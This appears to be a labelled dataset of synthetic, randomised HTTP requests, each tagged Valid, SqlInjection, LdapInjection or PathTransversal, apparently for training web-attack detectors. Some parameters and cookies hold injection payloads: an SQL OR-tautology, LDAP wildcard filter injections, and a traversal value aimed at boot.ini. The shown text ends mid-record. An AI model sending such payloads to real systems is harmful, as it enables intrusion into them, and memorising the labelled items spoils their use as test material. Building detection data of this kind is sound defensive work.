End - Id: 49421
Start - Id: 23618
class: Valid
GET /7MNO2jmQBYMNPfVLP/tIFGkBIt/iwdmveuac1slufmRXFc/rsedimtitsihhwGraim/87p_X/amoxh1hratmrtoeiig.jpeg?6rnr2tsob7ius=ln&8hgoellna6=smailrr6sajk&tdi=l&spTL.nlib@8=tomSHoohs+n%24shutdownsechoupdatexd&eec8iartwntdDf4=fvp&y4b9kANtnFyioxu=50&pRawyvhywoernsu=uaiw&nT=+esoev+ctoatxtermtttTs&ciDisot=srgon4o1&hsrht7Tets=heu+wq&iagsosa=0630&ur2nTep3dimt=R095u8y&xyt=bjenxtTsf7&ZZcadmin0aoAy.z0X=e63iwheregi%401drqa&gew1eeur=ps HTTP/1.0
Host: www.raaiffes.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.7, gzip;q=0.9, compress, compress;q=0.8
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 88.47.180.4
Cookie: hscriptbin_63_w=h5Ogcve
Cookie2: $Version="8"
Date: Wed, 03 Jun 09 19:43:16 UTC
ETag: W/"q-l_SQPwp.BdHFYyrHE."
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Tue, 14 Apr 09 11:35:15 GMT
If-Unmodified-Since: Mon, 12 Jun 06 03:02:02 GMT
If-Match: "GRR1P2K9KYUbKhZEU"
If-None-Match: "9qSE8iYCt4sGw6t2"
If-Range: "Rt5rfcHZQtAc_Bxc"
Max-Forwards: 2308
MIME-Version: 1.2
Pragma: to=e
Proxy-Authorization: aoteR iyibes=enaqlb
Authorization: Basic YmlpTDpyazhjY2U=
Range: 50-
Referer: http://je2s.ch/amoiih/alatidp/achly.txt
TE: deflate
Trailer: Connection
User-Agent: Mozilla/9.9 (X11; U; Open BSD i386 2.3; al-eu; rv:3.3.2) Gecko/03679960
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: 9.8 147.178.106.50, lentot/9.3 72.180.186.62:18
Transfer-Encoding: compress
Upgrade: gktu/1.0, isTtr/8.1
Warning: 271 126.64.164.69:05658 "3ffD5oti2in" 
X-Forwarded-For: 161.208.121.203
X-Serial-Number: 266315250602737413
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23618
Start - Id: 13239
class: Valid
GET /pr1h2UUV2yP/hbrnEa3ta/twMhooUL/mroQphsienedteoe1/ayNC-.WKZ80nOk/oIpr0ny_NL8p8/Gk2ITWKJM7th/eMhAv0aEq-2R8L/deeyCaiasnte.png?alioli=dkeehs2Stervd464la&5xtnw2gs=Rreyho&eDEeeuietoo=T%5Cgcxtermk9k%3B+5w HTTP/1.0
Host: www.rmseon9.it:80
Connection: close
Accept: text/html, image/jpeg
Accept-Charset: shift_jis;q=0.5, windows-1255;q=0.5, big5;q=0.4, x-mac-ce
Accept-Encoding: *;q=0.2
Accept-Language: uneNel-hn0, a-tba, aHrOse-Nk;q=0.9, 4ep-jh;q=0.7, e-n4em
Cache-Control: uee3on=ote9umi
Client-ip: 221.125.47.31
Cookie: ha9aehjbs7=5jfrom;as2sudEe=rceddq2n6objectaennh
Cookie2: $Version="9"
Date: Thu, 09 Apr 09 13:06:14 GMT
ETag: W/"6JCDvI-kKr1dGTKJuW"
Expect: i9hsauA
From: jNma@wOtd.fr
If-Modified-Since: Fri, 01 Sep 06 03:43:00 GMT
If-Unmodified-Since: Mon, 03 Oct 05 15:40:18 GMT
If-Match: *
If-None-Match: *
If-Range: "KbRPVEq_lonzPOigDH"
Max-Forwards: 3009
MIME-Version: 3.0
Pragma: t=tr
Proxy-Authorization: Basic dW90bnNyeGE6a2FUeWE=
Authorization: Digest response="1415AC69cdcCa69fa9d7166A94Aa134C"
Range: 16-5
Referer: http://www.3oee.fr/1iqim0as.php4
TE: deflate,deflate
Trailer: Pragma
User-Agent: Mozilla/9.2 (X11; U; Linux i386 1.8; 0o-nt; rv:3.2.3) Gecko/20564821
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: deflate
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 142.206.28.5
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13239
Start - Id: 38300
class: LdapInjection
GET /iUings0eWd/OkITjWb7W1D-9/Hgtz9SeUr/dahr1otienno4mtevt/iberaoh2fqesO9/H-4h-.htm?rH=re&oduaietoetpr=y6IkOL4%40iaV&storghr=qlafudoricrh3ffen&A@nodeMUGDhn-dropW=lyespeber&98riidhrebhdoll=02461458&drVftp=61905&dcpgsock_streamrSM=ietboqm&eceesheedge=or%29%28++%7C%287ug%3D*%29&tsetsitrttdre=ftuts&utoaswTi=68234467 HTTP/1.0
Host: 229.164.149.131
Connection: tzt7sf
Accept: */*
Accept-Charset: x-mac-roman;q=0.5, big5, koi8-r;q=0.9, x-mac-icelandic;q=0.4, x-mac-chinesesimp
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="91"
Date: Tue, 31 Mar 09 23:03:28 CET
ETag: W/".VbtjpDV.j-vgalLst"
Expect: 100-continue
From: atwahe@enInmlaS.org
If-Modified-Since: Sun, 19 Oct 08 04:21:11 CET
If-Unmodified-Since: Mon, 09 Mar 09 03:53:08 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: "dOZhf4E9qU1BmPkNq"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: meen=Lseipnd
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: /Bmurr/kgee/cEaeLr.jsp
TE: trailers
Trailer: From
User-Agent: Mozilla/8.2 (compatible; MSIE 8.9; Win 9x; t87poueeeq; aSne0naMyl; gidyoeebij)
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 7.2 www.ehaNmpt.tiff:57509, ogI/4.7 97.83.59.110
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 326 57.9.147.112 "sShwnetueur1tasgsaw" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38300
Start - Id: 45668
class: PathTransversal
GET /hufg5rla9cu/tostccniTltstrilwgsr/HKBcmd1pKo/en8/tnYDIuoSA/dqVGouKek/idKRY@.yURvKcZjdK@/1en6ir/tq8Q0zOVImr66grOFeHb/e6q9t6qonGcb18DZo_Wo/4NGXEWZea/D@evalqwindow.openqQZQ.php?akoHsd4eHe=2488478&0eug=td4he&veLi3het=5ee%2F&E7uegJ2cyi=fFI&ttnwqztdiua=u%3A%5Cwinnt%5Cboot.ini&oh8tem8tvoil1=hNuFeWlv95x&PQEH=6975&-kqT4deletenxYandp=redoen&eys0aEawsEo=80408179&racyxsae1oTtp=s46leoohc&utlse=%2Bgyin&ohsenjcseLyAhrx=g&onasEcNraRseht=zsa8cH&lU6M9H_x=73I.qoy HTTP/1.0
Host: 215.187.243.95
Connection: keep-alive
Accept: application/rtf, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: c-htxypt;q=0.5
Cache-Control: min-fresh=5098
Client-ip: 10.24.0.201
Cookie: norAllc==7);bIvugw=0593
Cookie2: $Version="823"
Date: Mon, 28 May 07 15:36:45 CET
ETag: W/"tX@AS.xg2TCYBvC8FMx"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Sat, 02 Sep 06 05:16:50 CET
If-Unmodified-Since: Wed, 12 Jan 05 14:09:31 GMT
If-Match: *
If-None-Match: *
If-Range: "bGleP.UdyMUqXecdXiZ"
Max-Forwards: 3
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Digest nc=84437ae2
Range: -62,101-,55-837
Referer: http://esek9.com/wchdd/dpgc05g/urr1mln/tl85ueu/yybsuO.png
TE: trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: cnkine/1.2.0.1
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x430
Via: FTP/8.7 www.jhee.tiff, 0.3 www.SsMe.jpeg:9
Transfer-Encoding: deflate
Upgrade: au3/0.3, DRlrd/5.7
Warning: 203 www.aloLt.js "tecu06" "Sun, 07 Mar 04 20:34:54 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45668
Start - Id: 760
class: Valid
GET /systemYBP_Y_HJs/i3s42nf8emtaAwAa/seAolsna/q0RwdivYoB/iKoQ5JQs/7h/dYN73Is91mFWxY@xNk/VmfromPQ0/r0/knalbEe/QmDvgb/etxo.exe?esCEtaete=optluz&afnymf9=ddcSiNxNetMda&triuEEl5=3992&earleEde=rslrQeRn5&FiQjbsfcecg=l66.V&shonu=xoroikIoi&eR.SvFQO0pH=i%25at%297bodydeletesgITd1sshutdowndtTS&xaAxth3et=V HTTP/1.0
Host: 215.13.66.106:6
Connection: keep-alive
Accept: video/mpeg;q=0.8
Accept-Charset: x-mac-greek, iso-8859-1;q=0.2, iso-8859-3, iso-8859-7;q=0.2, hz-gb-2312
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 197.141.119.53
Cookie: Fx7119a3Xlr9=40952;mstroi1htoterh4=s;hnioe=cQmr4
Cookie2: $Version="0"
Date: Mon, 20 Apr 09 03:55:30 CET
ETag: "anvX4gw6DIXhJA2XR6I"
Expect: 100-continue
From: eet5ayi@trifo.it
If-Modified-Since: Thu, 15 Mar 07 03:14:49 CET
If-Unmodified-Since: Wed, 01 Jul 09 07:17:53 UTC
If-Match: "h-@-hCQ1TM3Rd_jz-"
If-None-Match: "MGgGHrIQJQ3Vxm1X-"
If-Range: *
Max-Forwards: 7
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: 9eT6pJ noloyso=splar
Authorization: yenn8 hJd86oss=ei8toz
Range: 74705-710
Referer: /diddde.php
TE: deflate,trailers,gzip;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/0.2 (X11; U; Open BSD i586 7.9; nw-cE; rv:8.6.0) Gecko/15712438
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 802x453
Via: 7.8 27.107.78.69, HTTP/8.1 www.sniej0i.js
Transfer-Encoding: gzip
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 097 63.165.234.255 "88sneyi3e8nTe" "Thu, 16 Oct 08 07:24:34 GMT"
X-Forwarded-For: 126.215.82.178
X-Serial-Number: 647816
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 760
Start - Id: 41765
class: SqlInjection
GET /3ybDYGPmN/nxiiioNm7oamwiilwtai/dRPEtxUwzFb5r77/fSFacai/sdEfl/cSoaYNw/7UIy/rO1qX5jcs0cnE.NzXw/meSIvpHgO0-/s7doroEibo6Oa8pgiaJ/sZlb3px/oe5w2Lh.pl?where.eprocessing-instructionR=nPxp6B&gs=782&U44HewthoRaug=7maile8%26%40dqqu&e1hBPr5QIRK=1tfceSenm97eprcpo&5spatn=41&96idd1nulyzsi=%27+++++OR++%27sdfadaeti6v%27++++%3D++++%277A3u%27%2B%27a5%27&tmCxeestgeelsHv=q%3D%5Cc HTTP/1.0
Host: www.nxinbthd4i.be:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=26
Client-ip: 34.136.27.140
Cookie: rr=lrtputwnhr;is3aptprVe70eS=aetuhh;r9a72e=88157
Cookie2: $Version="0"
Date: Thu, 31 Dec 09 10:55:30 UTC
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: niInmY@ensa.be
If-Modified-Since: Mon, 26 Jan 04 07:28:11 GMT
If-Unmodified-Since: Sun, 28 May 06 15:22:32 CET
If-Match: *
If-None-Match: "92z8xHer8Z3P36eMQL.a"
If-Range: "BIbApiH3NzoSBEGi"
Max-Forwards: 7009
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM bnR0b1I2ZWVzdGlybmVJaG5lOG1lbm43YmV0dGFmbW4yZXdlTg==
Authorization: NTLM b2VsZGVhdE44aWU1NHlzZXJhdGJpZXJpUmJDbjJlbmV3eU5iYXZucGlD
Range: 4234-490888,-164882
Referer: http://ielost.cz/tftR/elrro/dLri22l/aio0rr.ace
TE: gzip;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 6.4; ce-8m; rv:0.9.7) Gecko/75234134
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 391x8982
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: compress
Upgrade: hyt/2.3, usSsro/3.3, qhndkt/3.2, ay8/2.2
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41765
Start - Id: 12098
class: Valid
GET /4etla6p2eoevt/VqjiqvMzN/AuUDPEQ/rp.H-XQxZ3qHNb1uW4.htm?s-rP29HMd=r91x%40w&wrnd4c=xQex9r7neo&atneofp2Ftd4=ya._koTJ&Etn7noermyhbde=vfa%26&osah=nkj&vwuqbureqliga=j8%40p&nrfgGeo=5oeeg%25o%3Alt%3Dur&dprhagC=sC&4ah4fod8HEfnsa=9841837&rrs7Sdii=4&i9lpcoe=QeOeincludefhmeta HTTP/1.1
Host: 50.162.47.243
Connection: uohisIor
Accept: text/xml
Accept-Charset: euc-jp;q=0.3
Accept-Encoding: deflate, gzip;q=0.3, compress;q=0.9, deflate, deflate;q=0.8
Accept-Language: 9udnerv-mm, a-ect
Cache-Control: ru=68san
Client-ip: 222.100.224.249
Cookie: or5Uhlnewva=s_QgZBe;2a=rr;6e=aiaaceX;tt=s7;us9esl=r.5xp9s.yO
Cookie2: $Version="4"
Date: Sun, 20 Aug 06 03:19:40 CET
ETag: "B_yWLx.fRRhYiw6gV"
Expect: Epfsht
From: nj6pNha@dohie.ch
If-Modified-Since: Wed, 25 Nov 09 22:15:25 UTC
If-Unmodified-Since: Mon, 26 Jan 04 20:54:24 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Jan 07 24:20:10 CET
Max-Forwards: 591
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: tdsfn gn6Hi=ruDos9tw
Authorization: Basic amlsb2l0dXQ6TGM5dG1k
Range: 320-,-2,3-504
Referer: http://neeie.org/h80ioo/skteS/dtTehan/nocol/ienL1.php4
TE: chunked
Trailer: Trailer
User-Agent: ouenbjkc/9.0.6.5
UA-CPU: Sparc
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6469x6483
Via: 3.3 www.nt5ntf.shtml, dTE4at/9.7 www.ecpsthut.png:3809
Transfer-Encoding: deflate
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 222.31.114.163
X-Serial-Number: 739755
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12098
Start - Id: 24941
class: Valid
GET /7s/dexsqybshotnstlslE3/rxies0w8jy6oL/OnOmeta/access_logH-I/Itdph979rjscriptxHM2/h_suExl3Omwget.js? HTTP/1.0
Host: www.rmpiou.fr:80
Connection: scnl
Accept: text/xml, image/png;q=0.6, application/zip
Accept-Charset: iso-10646-ucs-2;q=0.3
Accept-Encoding: *
Accept-Language: fP9t-eaam;q=0.5, ke7oesG-ul, fNIam9-syrr;q=0.7, j-pQRfek;q=0.1, R-hfsafl3;q=0.5
Cache-Control: max-stale
Client-ip: 172.135.105.135
Cookie: eo=rn
Cookie2: $Version="11"
Date: Wed, 29 Oct 08 02:29:45 UTC
ETag: W/"h2Xmy5GCd4Wj_v4L6-3"
Expect: de4t
From: iefmllR@anati.de
If-Modified-Since: Tue, 01 Mar 05 09:42:16 CET
If-Unmodified-Since: Sat, 04 Feb 06 02:06:04 UTC
If-Match: "L5hwtNbjKLlqccr8Np@w"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.2
Pragma: ecay5Rwa=wtihuacw
Proxy-Authorization: Digest cnonce="aeio91"
Authorization: 8nesao aeuTkre=eRHdrH
Range: -47448,86125-296,-084
Referer: http://www.no9w.fr/t6ra/yeLeh/jnEssn.pdf
TE: trailers,deflate,deflate
Trailer: If-Range
User-Agent: hpTfFDaFEh http://www.7ouoelso.cz
UA-CPU: Sparc
UA-Disp: 899,4850,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 778x801
Via: coaszs/6.5 29.242.20.72, 7.2 53.84.170.216, 8.7 www.gi9eqb.png
Transfer-Encoding: slwusg; DoDt=mslzovfu
Upgrade: ttaild/2.4, veere/8.1, dntrep/1.5, eseTr/3.4, ieS/1.5
Warning: 423 89.183.100.167:0470 "eepcy4ogcNtmpn1e36sn" 
X-Forwarded-For: 38.96.136.60
X-Serial-Number: 2466804840974150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24941
Start - Id: 9118
class: Valid
GET /mMuNMX8@8/jRVSF/mlnailaelrzenhie/eVEBXSFQUu/uvQZivIrR1K77c/a@sW-6I_XYHf.f/aCVYZ7ThK/ow0.LOsO/9it/ooSfscmajshnab4nu1i.dll?els8iCAoht=h&1Mysock_streamqLyedOO=k%29&sRrascHOpessaos=SnE1eotLvssne7u6Ru&sneeae=nst0ttphamwnmt2w&athnTpcznw=i1H.&jom1he8arp=oomhduqhtC&hnitLami=piotmwlm3ypwav&mKL.Zstdind.=22156&tccjnrii7I8ng=samiyCT&yh3ENb=13971&hmarsintsbr=drAbeeyfnyi&tufBnou2oai8s=tiWe HTTP/1.0
Host: www.idwt5.be
Connection: sEiSa
Accept: application/*, video/quicktime, text/html;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.8
Accept-Language: o9-k, said-hdoii, sniaoz-limr8, eaw-enLcliEa, weftruln-l
Cache-Control: no-store
Client-ip: 226.169.43.157
Cookie: enqan0danilVpt=yh >u;xZfF=tlike$llhtcw;bJCHbYscq@6=q m2fT?r;aXscriptjMxQ9=elad;orVzirrnmc=5461062
Cookie2: $Version="73"
Date: Wed, 17 Dec 08 04:53:21 UTC
ETag: "hW5k@Kyihyld4g8xx1g"
Expect: 100-continue
From: pteaote@rrntdlsf.com
If-Modified-Since: Sun, 15 Oct 06 06:50:49 GMT
If-Unmodified-Since: Thu, 22 Jun 06 07:19:09 CET
If-Match: "tLohMTnFbKJ8jbvEmqv"
If-None-Match: "oN7oaROM2mihVI_TvKH"
If-Range: *
Max-Forwards: 9
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: PMhc eie4rqi=aerRel
Authorization: Digest response="0d2e1730db86ce6CE9Ade6B1D7C3CfD6"
Range: 209468-,-773443,52-920348
Referer: http://ac65cicq.st/ardtIbj/tnk8I/eet58abg.zip
TE: gzip,trailers,gzip
Trailer: Accept-Charset
User-Agent: idahrpneN (eK3EjuS; sB78cDH; kylVmaU; hNMA2k9)
UA-CPU: x86
UA-Disp: 592,6168,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 9463x953
Via: HTTP/1.7 248.198.103.4:5658, 7.7 www.TUpcB.jpg
Transfer-Encoding: yTstb; erete=hiieu
Upgrade: Ccjte/2.9, 5asi/4.6, fxs/9.8, earNo/3.3
Warning: 685 144.205.150.196 "yel0eefhm0pmd" 
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 688483710117371
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9118
Start - Id: 7347
class: Valid
PUT /Ucpo.jpeg? HTTP/1.1
Content-Length: 97
Content-Language: I,vs
Content-Encoding: identity
Content-Location: /8uniabsc/tebeos9/nbdajHaL/Jnloir/mytd.asmx
Content-MD5: ZXJpYXZEb29uY2RhYWtldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 22:45:36 CET
Last-Modified: Sat, 10 Jun 06 14:03:09 CET
Host: www.Renhrhe.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-4, big5, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 127.183.145.17
Cookie: fssvirhisTnl=jGHzA;tscelnajssl=~9de ;ov=278837;hoe1tedOiwgAj=t;8Ot=hn
Cookie2: $Version="61"
Date: Sat, 05 Aug 06 22:14:41 CET
ETag: "ku03okQOvBZ8jpeB"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Sun, 21 Sep 08 11:48:29 UTC
If-Unmodified-Since: Tue, 20 Jan 09 07:04:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Oct 05 14:44:42 GMT
Max-Forwards: 693
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: oeela ttdliete=bSasc
Range: 90-7652
Referer: /HYhbi8D.png
TE: chunked;q=0.6,gzip,trailers
Trailer: User-Agent
User-Agent: hrbHSta/7.8.5.4
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 965x983
Via: 7.7 www.otEcTdgu.jpg:625, lBeOIr/4.9 91.76.57.36, 2.9 www.nrmMer.gif:3383
Transfer-Encoding: compress
Upgrade: rweae/5.2, eddh4n/9.2, hym/0.5
Warning: 833 116.43.43.166:1 "sgrtanet0w" 
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

vat=Mtcloorsarnou&qTias=h'uRhomedeleteua(dit&a0=t(n&aSncni0=s5Guvany3eeiq&efefTp0luia=dqtia

End - Id: 7347
Start - Id: 20083
class: Valid
GET /yC3Qm74IhB7C/cooHsE7eyaehx6rrr16/alrnr9nEf5msneom/rMUdoLy/Tiz/lsz/xH/ami/eHxs8Nleettsatpdx.gif? HTTP/1.1
Host: 133.68.132.22:79517
Connection: 4kcNaexi
Accept: */*
Accept-Charset: iso-2022-jp;q=0.3, macintosh
Accept-Encoding: *;q=0.2
Accept-Language: rem6hJ-E;q=0.9, APwmot-tT, aRat-aueeuar;q=0.0, ts-uxld8as
Cache-Control: no-transform
Client-ip: 123.247.238.159
Cookie: sms=6752239066
Cookie2: $Version="516"
Date: Wed, 18 Apr 07 10:27:55 GMT
ETag: "clMFv0qbzflnor@5YCDd"
Expect: 100-continue
From: alaua@llalec.uk
If-Modified-Since: Thu, 28 Apr 05 19:06:24 UTC
If-Unmodified-Since: Mon, 21 Dec 09 13:34:16 UTC
If-Match: "gPB2DGf-5-u_UrlYJE0"
If-None-Match: *
If-Range: Fri, 17 Dec 04 19:39:19 GMT
Max-Forwards: 79
MIME-Version: 0.9
Pragma: ar7elgh='C'
Proxy-Authorization: Digest nonce
Authorization: NTLM YzNob2ZpZWx0ZU9xdGFyYmFlaGVuaXBhYWNydXZzVDd0ZWFyZWlycg==
Range: -09642
Referer: /wn4u/OnuX6h/u7b7oetu.shtml
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 7.6; Ci-4i; rv:9.9.4) Gecko/28132714
UA-CPU: Sparc
UA-Disp: 894,918,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5910x691
Via: 3.6 160.97.239.76:360, 8.1 www.rqtaB.shtml:55480
Transfer-Encoding: identity
Upgrade: 5an/6.4, cTdehl/9.0
Warning: 223 241.60.75.35 "5tsnebAiy" 
X-Forwarded-For: 51.235.225.48
X-Serial-Number: 9909201039312
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20083
Start - Id: 39089
class: LdapInjection
PUT /i0epoayw/ebsi4oelEk5eanwnrnRh/tyLdjeXq-r4s_/na4e5oe/9saDhll/Wid/a6/g0rhirutmh.gif? HTTP/1.0
Content-Length: 251
Content-Language: RhbOiba,nsb0
Content-Encoding: deflate
Content-Location: http://www.nsadwNj9.net/eeoesveh/shht/punhaes.tiff
Content-MD5: bHRsSGVtdGVvb3djc203dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Nov 07 10:08:59 CET
Last-Modified: Sun, 11 May 08 08:13:28 CET
Host: www.uillhgoeh.org
Connection: saoatRoe
Accept: text/xml;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, deflate, identity;q=0.3, deflate, deflate;q=0.0
Accept-Language: ehaRzs-lr9iNor;q=0.8, hnieei8c-cwactim;q=0.3, ne4nmix-rntnea, rr8bhlmp-ssoEix, o894t-eIc;q=0.5
Cache-Control: no-cache
Client-ip: 102.176.107.199
Cookie: uvt=ihF]/;celea=)    (  |(displayName=had*) (name =had*  )(    mail=had* );tBve=oe do4;2ids=heleqeanlegmoLuhne;ililFr=499;sortmPlmswn=8194721
Cookie2: $Version="88"
Date: Wed, 17 Dec 08 20:46:02 CET
ETag: W/"Xs4Tog_kh9k2w5gj@wq"
Expect: 100-continue
From: sqarh@agbp.net
If-Modified-Since: Sun, 06 Jul 08 13:48:28 UTC
If-Unmodified-Since: Mon, 21 Nov 05 09:21:53 CET
If-Match: "2jE33nimqiP1CRB89P"
If-None-Match: "-QgBnIEZx31E-i_gMM"
If-Range: Sun, 24 Aug 08 21:20:23 GMT
Max-Forwards: 86
MIME-Version: 1.0
Pragma: no-cache
Authorization: Digest opaque="Srpe"
Range: 5646-401977,1107-6680,-60
Referer: http://5otausi.it/n3de/enca/eneeoh/peltasi.php
TE: deflate;q=0.6
Trailer: Expect
User-Agent: Mozilla/4.4 (X11; U; SunOS sun4u 8.5; s8-gt; rv:4.7.1) Gecko/93747938
UA-CPU: Sparc
UA-OS: Win95
UA-Color: color32
UA-Pixels: 935x997
Via: 2.9 150.126.212.133
Transfer-Encoding: identity
Upgrade: M1r2t/2.6, amimlh/2.2
Warning: 809 www.Mggpkus.css "hf91iksbiA" "Sat, 12 Nov 05 05:54:57 GMT"
X-Forwarded-For: 171.128.179.42
X-Serial-Number: 173254856208744032
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

inuU8q=xpwBH1&tt=66&rnhr0e0ph=rypxM92l&Ah=o38IwbDQ-OZ&ojctHtluie=579753729&g5rv=wDshtacces admin'ow&asetnym4h=(adsd&itez=a0nBw&rirtunoohw=0746140&ehn6va=9hntXt&icahhe0=5622&vnlc4rjXt=5@9T&dhmegt=sfsvW9rqt3Z9&Aooy6ttM3=rdsoge6t&czau6sfnn=74365069

End - Id: 39089
Start - Id: 18246
class: Valid
GET /tc.Bs/m-@o/Entomymiisqe/CNnehrrymtiLmceds/aqOTwDDVVRep_/lPNuyqiv7hdsZ.html?Duonceltir=610721&ae=38&osvucottatsx=it8qehreydtef&1gt9TcdlPwc7es=optirOEc HTTP/1.0
Host: 230.231.145.144
Connection: 65xa9l
Accept: */*
Accept-Charset: windows-1250;q=0.9, windows-1255, utf-8, euc-tw, iso-2022-jp;q=0.2
Accept-Encoding: gzip;q=0.4, identity;q=0.5, gzip
Accept-Language: *
Cache-Control: min-fresh=28250
Client-ip: 70.11.205.148
Cookie: suhnzS2=m)exec;ijkuOooteoSCo=48617849;n2dzaoiimcooae=1
Cookie2: $Version="214"
Date: Thu, 09 Nov 06 04:40:06 GMT
ETag: "qBXzJyw3LgGQZ0kD"
Expect: 100-continue
From: anwits@qdrec.org
If-Modified-Since: Sat, 04 Aug 07 21:17:19 GMT
If-Unmodified-Since: Fri, 04 Feb 05 12:15:12 GMT
If-Match: "EkNYnUqy1IenuTENaB"
If-None-Match: *
If-Range: Sat, 28 Mar 09 08:43:46 UTC
Max-Forwards: 78
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: cjdck o0Qk=r8ie
Authorization: iobe nhdab1T7=earomou
Range: 41-16
Referer: /oer7h54o/0cfzashS.nsf
TE: chunked;q=0.4,trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/2.1 (compatible; MSIE 1.4; Solaris; uan3; gHoAie4sO)
UA-CPU: PowerPC
UA-Disp: 3033,0049,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1021x3555
Via: 3.9 46.62.191.85
Transfer-Encoding: compress
